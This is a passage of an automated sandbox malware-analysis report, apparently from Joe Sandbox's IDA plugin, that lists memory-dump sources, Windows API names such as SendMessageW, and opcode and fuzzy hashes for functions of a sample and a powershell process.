                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                  • Opcode ID: 244b951d94e5f9897b396de72cbefd0668f69bd73a690cad0b5faa070692d96e
                                                                                                                                                                  • Instruction ID: 9189e78ed9fce6ceda71b300443b0d1f1a49498b20ff0cde36ddc6200205b28f
                                                                                                                                                                  • Opcode Fuzzy Hash: 244b951d94e5f9897b396de72cbefd0668f69bd73a690cad0b5faa070692d96e
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D11F2B58003589FDB10DF9AD845BEEBFF8EB48320F10845AE558A7250C3B5A584CFA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 073552E8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2140856094.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7350000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                  • Opcode ID: ae364641bd33f537af91ea0787aa8a336864a18bf063f0e453abb27fa5e8bd6f
                                                                                                                                                                  • Instruction ID: 1a29fe1907ef3124abda27f0e3b89040e97aedb3c1e56baeee1ab9f77fb02026
                                                                                                                                                                  • Opcode Fuzzy Hash: ae364641bd33f537af91ea0787aa8a336864a18bf063f0e453abb27fa5e8bd6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D1143B58003498EEB10CF98D945BDEBFF0EB08324F10845AD598BB291C375A984CFA4
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                                                  • Opcode ID: 3a0db765e1496fe4cec118add4d695f7f15d649846e055964f849a18b0a84a61
                                                                                                                                                                  • Instruction ID: 24388722f8e2346d315f89c7f62d800f464a0514c4e24d92d162fc4399bef035
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a0db765e1496fe4cec118add4d695f7f15d649846e055964f849a18b0a84a61
                                                                                                                                                                  • Instruction Fuzzy Hash: 031100B5C047988FCB20DFAAD844ADEFBF4EF49324F14845AD468A7251D374A144CFA6
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 04AE0E2D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                  • Opcode ID: fb44314ceebcfc23a5d65f35a23a329e5b1fcf999845ddfc4a0e4bc70d7fc9d1
                                                                                                                                                                  • Instruction ID: 62c7a10eadec4800c311d77563b3c79da94dd069dfe96a5694ce0ea8efde19b0
                                                                                                                                                                  • Opcode Fuzzy Hash: fb44314ceebcfc23a5d65f35a23a329e5b1fcf999845ddfc4a0e4bc70d7fc9d1
                                                                                                                                                                  • Instruction Fuzzy Hash: AD1112B5800358DFDB10DF9AD884BDEFBF8EB48320F10841AE558A7210C3B5A984CFA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2130873411.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f6d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: eb696909587dcfe218baeac8b7257b80d03e02829fa687e6ab8d2779fdfb0e5f
                                                                                                                                                                  • Instruction ID: 5ce9d9b1e29b4ab903971eba07303b1ec42f6d710f7bb56e0c6e59039d3799c3
                                                                                                                                                                  • Opcode Fuzzy Hash: eb696909587dcfe218baeac8b7257b80d03e02829fa687e6ab8d2779fdfb0e5f
                                                                                                                                                                  • Instruction Fuzzy Hash: 48212872A00244DFDB05DF14D9C0B16BF65FB98324F24C169D9094B256C736EC56E6A2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2faee82d6362ea46e9013ee484505ac50efa609d0649567b2933073933359857
                                                                                                                                                                  • Instruction ID: 0d17ae7cde53e07e70ed60cdc89f5766598e43df5d668562fddd2e43971877c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 2faee82d6362ea46e9013ee484505ac50efa609d0649567b2933073933359857
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B212672504204EFDB40DF14D5C4B2ABBB5FF84324F64C66AD84D4B256C33AD846E6A3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4ce37209d3b7c69d7a60bbefedd8c74a379a8d4eabc1b512822bea769bfb6fa6
                                                                                                                                                                  • Instruction ID: e5297f2c1a23e6cf7c9081ffe3d2553526b165c5e1e39555b204db308b9973d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ce37209d3b7c69d7a60bbefedd8c74a379a8d4eabc1b512822bea769bfb6fa6
                                                                                                                                                                  • Instruction Fuzzy Hash: 3421D371A04204DFDB05DF14D980B26BBB5FF84324F64C56AD94D4B256C336D846DA62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 925d1a98d7f6f12aa257b9c1da72de3276da837a059fcbad23aa2e14cb523b86
                                                                                                                                                                  • Instruction ID: 3f697da5f892a4d06e000d8926302160071cb9bd0712f06ec524119d3c4c7a62
                                                                                                                                                                  • Opcode Fuzzy Hash: 925d1a98d7f6f12aa257b9c1da72de3276da837a059fcbad23aa2e14cb523b86
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21F275604200DFCB14DF14D984B26BBB5EF84324F64C56ED80E4B29AC33AD847DA62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: cbe7accfc92fead2c2f56afe6b4b8cfcee0aa9644e8d1ae2608d17e1fca25d5a
                                                                                                                                                                  • Instruction ID: 161440c7dbc6ca4b015b47a9ab090ce4feb6728793bb0217cc39854d57c630f9
                                                                                                                                                                  • Opcode Fuzzy Hash: cbe7accfc92fead2c2f56afe6b4b8cfcee0aa9644e8d1ae2608d17e1fca25d5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 21214F755093808FDB12CF24D994715BF71EF46214F28C5EBD8498B6A7C33A980ADB62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2130873411.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f6d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                  • Instruction ID: ef65d82679139a69df83aa90bf261cfac12b380af42920492ba24f1c000d147c
                                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                  • Instruction Fuzzy Hash: ED110372904240CFCB06CF00D5C4B16BF71FB94324F24C2A9D8090B256C33AE85ADBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                  • Instruction ID: 3f7cc032fe7f5cfd72fc989b2aff86de77dbc6f701e9fda372ae8545ac0ea0b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                  • Instruction Fuzzy Hash: C311A975904280DFCB06CF10C9C4B15BBB1FB84324F28C6AAD8494B296C33AD81ADB62
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2132885047.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f7d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                  • Instruction ID: 6ac1f1c6f53cdea71d85ca21b458359191110dba3ab398159353cb2b48573a79
                                                                                                                                                                  • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                  • Instruction Fuzzy Hash: 1311B275904280DFDB11CF14D5C4B19FF71FB84324F24C6AAD8494B656C33AD81ADBA2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2130873411.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f6d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 57f1d6a39deb09d8867b44c286d97051650d42f83d5c851d98214862fb1b7f51
                                                                                                                                                                  • Instruction ID: 16c03c2c19573cf5091f1db113fd27e29535ddda70bd92b3274c0459bbedd2cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 57f1d6a39deb09d8867b44c286d97051650d42f83d5c851d98214862fb1b7f51
                                                                                                                                                                  • Instruction Fuzzy Hash: 33012B31A083409AE7108F29CD84767FFD8EF41334F18C52AED090E182C238DC40D6B2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2130873411.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f6d000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 289edab0c6b3ab499043c295d482a7c50d774551f11af7b5b51024d3eafe45d5
                                                                                                                                                                  • Instruction ID: a34a601c1b218ce9d57857724aacce12ad4c791bdff2097989df758586e6dca1
                                                                                                                                                                  • Opcode Fuzzy Hash: 289edab0c6b3ab499043c295d482a7c50d774551f11af7b5b51024d3eafe45d5
                                                                                                                                                                  • Instruction Fuzzy Hash: 24F062719083449AE7108A1ACD84B66FFE8EF95734F18C55AED084F296C2799C44DAB1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                                  • API String ID: 0-1677660839
                                                                                                                                                                  • Opcode ID: f343fb53d99507833e4fd28ae23ae63aa501046a84337b8bffb332315dc75139
                                                                                                                                                                  • Instruction ID: 3f16d9cd4006c5edb7d7481d3a4d7a5c071aa4febdf0dedb2fb9368bc87fca4d
                                                                                                                                                                  • Opcode Fuzzy Hash: f343fb53d99507833e4fd28ae23ae63aa501046a84337b8bffb332315dc75139
                                                                                                                                                                  • Instruction Fuzzy Hash: A9426F30A00268CFDB54DFA9C8907AEBBF2EF88300F148569D459AB395DB74AD45CF91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2136281677.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4ae0000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 35dc8bbf3d928b39a83104fbbf8e8165139c0d96b0735f2ea095548645c701a2
                                                                                                                                                                  • Instruction ID: 89a80b90276d7257ac950bba36d9ac87446868d15c31d585e69b273b2e46ad75
                                                                                                                                                                  • Opcode Fuzzy Hash: 35dc8bbf3d928b39a83104fbbf8e8165139c0d96b0735f2ea095548645c701a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 91C16C31E042198FDF14CFA6C9807ADBBB2EF89300F14C5AAD459AB255EB70E985CF51
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2133925487.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1180000_9RM52QaURq.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 00f534d3beaad2d6721bc7c7c88b5ce57326ceff2aace44290f9b8eef38d257f
                                                                                                                                                                  • Instruction ID: 9c897d80ca766bdfff12cad808d5aad11b4a7c606cfaa00868dfc06a625927a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 00f534d3beaad2d6721bc7c7c88b5ce57326ceff2aace44290f9b8eef38d257f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6DA16F36A0021ACFCF09EFB4D84459EB7B2FF85304B25816AE901AB265DB35E956CF50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4f122bb596b6f49e10d44d84ad2fb8de02fade6eea51f8b1c350f869a1df7c76
                                                                                                                                                                  • Instruction ID: eef22ab8244857684fca8e17e5e252f8e0f2fccddae7b1d0b3cd8d6a8c5adc8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f122bb596b6f49e10d44d84ad2fb8de02fade6eea51f8b1c350f869a1df7c76
                                                                                                                                                                  • Instruction Fuzzy Hash: 76916571B006549FEB29EFB4C4145AEBBE2EFC4604B00892DD54ABB350DF746D0A8BD6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2508f3abd9abdba11eb85e7887b46373b873164aa8987794fc4ba744fb4a69dc
                                                                                                                                                                  • Instruction ID: 571ad8fd7dd4ed1ace770455d9f739ab0af9e8400970819c1d44fc0cdcb6bb8b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2508f3abd9abdba11eb85e7887b46373b873164aa8987794fc4ba744fb4a69dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 77915571B006199BEB29EFB4C4145AEB7E2EFC4604B00892DD50ABB350DF746D0A8BD6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                  • API String ID: 0-1420252700
                                                                                                                                                                  • Opcode ID: 8d35fca4222419195210b34708c85b1978c9f5928882b3a199907d620f135c40
                                                                                                                                                                  • Instruction ID: 2bdc17640dddc8732f89b6a83d9a95235528b4efa59bbd05123a681de176cb04
                                                                                                                                                                  • Opcode Fuzzy Hash: 8d35fca4222419195210b34708c85b1978c9f5928882b3a199907d620f135c40
                                                                                                                                                                  • Instruction Fuzzy Hash: D81268B17042468FCB55AF6898007AFBBA6AFD2728F14847BD505CF362DE35C846C7A1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7980000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'^q$4'^q
                                                                                                                                                                  • API String ID: 0-2697143702
                                                                                                                                                                  • Opcode ID: 3912c152fc564761bf6957e29fbddb938b0c37514b5e778e7f3a121d5d5b5493
                                                                                                                                                                  • Instruction ID: 153c6d99023855e09a50c53910cf51acc2a529ce896548f8a68ce3309aaa0b57
                                                                                                                                                                  • Opcode Fuzzy Hash: 3912c152fc564761bf6957e29fbddb938b0c37514b5e778e7f3a121d5d5b5493
                                                                                                                                                                  • Instruction Fuzzy Hash: 442236B1B00206DFDB54AF69D5006AABBEABF85324F0484BAD505CF351DB36DC85CBA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: (bq
                                                                                                                                                                  • API String ID: 0-149360118
                                                                                                                                                                  • Opcode ID: a82d7a93539a60ee27c3e54c400683e3ed85c1d66085e397b73857fc4408df6f
                                                                                                                                                                  • Instruction ID: 56d73cf349659f4f0392539aa7a5d9989771d43de8ed625bba2669b1083d9a71
                                                                                                                                                                  • Opcode Fuzzy Hash: a82d7a93539a60ee27c3e54c400683e3ed85c1d66085e397b73857fc4408df6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C41FB38B042158FDB15DF68C558AADBBF1EF89725F1540A8E806BB3A1DB35EC01CB61
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: (&^q
                                                                                                                                                                  • API String ID: 0-2067289071
                                                                                                                                                                  • Opcode ID: a15bc7c3e3b7a34a334286457a52408a7ea6bf602794f9b21fca093487f66dc4
                                                                                                                                                                  • Instruction ID: a74dcdfbc9a5caa2c13ef54bfdb52d16cf7b18bbbe96ab15f52c3914cdab5366
                                                                                                                                                                  • Opcode Fuzzy Hash: a15bc7c3e3b7a34a334286457a52408a7ea6bf602794f9b21fca093487f66dc4
                                                                                                                                                                  • Instruction Fuzzy Hash: 4521B071A042588FCB14DFAEE504BAEBFF5EF89320F14846ED418E7350CA34A845CBA5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8fbb5e6d3e77f019edd77fd0dfbf6f1d1805e9e2fafede37f033bbc78c8b22db
                                                                                                                                                                  • Instruction ID: 4a92f308f099102cd736d7ade7c7b5087092e9b35a20a0fd66bab44f2f58f578
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fbb5e6d3e77f019edd77fd0dfbf6f1d1805e9e2fafede37f033bbc78c8b22db
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F917AB5A002058FCB15CF59C594AAEFBB1FF88310B248599D915AB365C736FC41CFA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 051aa865612555f0b8433138165a5d66418d00ffb4e89cf36542057f98550e80
                                                                                                                                                                  • Instruction ID: a00a042acc70fc95ffb909cc138f64f0b3cfece2097141d2ba3e09a45f849c1e
                                                                                                                                                                  • Opcode Fuzzy Hash: 051aa865612555f0b8433138165a5d66418d00ffb4e89cf36542057f98550e80
                                                                                                                                                                  • Instruction Fuzzy Hash: 27611971E01248DFCB14DFA9D58469DBBF1FF88311F18816AE819AB365DB34A845CF60
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6a6b71ca2653096bdae59f9ce42a57f7024b93cd34d7c06fb0902c2bc699623c
                                                                                                                                                                  • Instruction ID: 2c5a7435b760f898a3b6226020f13e404a695902e760f8ac2f8691676dbcedb6
                                                                                                                                                                  • Opcode Fuzzy Hash: 6a6b71ca2653096bdae59f9ce42a57f7024b93cd34d7c06fb0902c2bc699623c
                                                                                                                                                                  • Instruction Fuzzy Hash: AE51D2383042059FD714CB79D944A2ABBE6EFC8314F1545B9E90ADB361EB35EC018BA0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1553a9991838a52444bb30e7e5bb96fe9a5740c1d216f95293f53e180037a535
                                                                                                                                                                  • Instruction ID: 565d7ce9a92b9f5d35adb094e948372e94c742d37250263c42238ff8bd417c91
                                                                                                                                                                  • Opcode Fuzzy Hash: 1553a9991838a52444bb30e7e5bb96fe9a5740c1d216f95293f53e180037a535
                                                                                                                                                                  • Instruction Fuzzy Hash: FD61E771E00248DFDB14DFA9D58469DBBF5EF88315F18816AE809AB264DB34AC45CF60
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d2bb743c9f5dc68e7ca73efb60c6a6cb80689265a54a564d5a170bb2d76f1ad8
                                                                                                                                                                  • Instruction ID: 815f03f8edf92ec7fea8da162fbea6b02ccb7f7406b29b0c8155f2d1f62fc87a
                                                                                                                                                                  • Opcode Fuzzy Hash: d2bb743c9f5dc68e7ca73efb60c6a6cb80689265a54a564d5a170bb2d76f1ad8
                                                                                                                                                                  • Instruction Fuzzy Hash: 08515D74B00205CFDB14DF6CC69492ABBE6FF883107158469E949CB32AEB34ED058B91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1977754721.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_4a50000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 798869fb8f1e8b0ad352b03ccaedd8749fa7e5e7f598e43c79418a51e2c2cc23
                                                                                                                                                                  • Instruction ID: 73680b0939625588933ae7b50c4d897673321c2f06765a085a5c14cc81ccdc3d
                                                                                                                                                                  • Opcode Fuzzy Hash: 798869fb8f1e8b0ad352b03ccaedd8749fa7e5e7f598e43c79418a51e2c2cc23
                                                                                                                                                                  • Instruction Fuzzy Hash: DF411B74B10205CFDB10DF6CC69492EBBE6FF88314B158469E949DB329EB34ED058B91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.1984456562.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
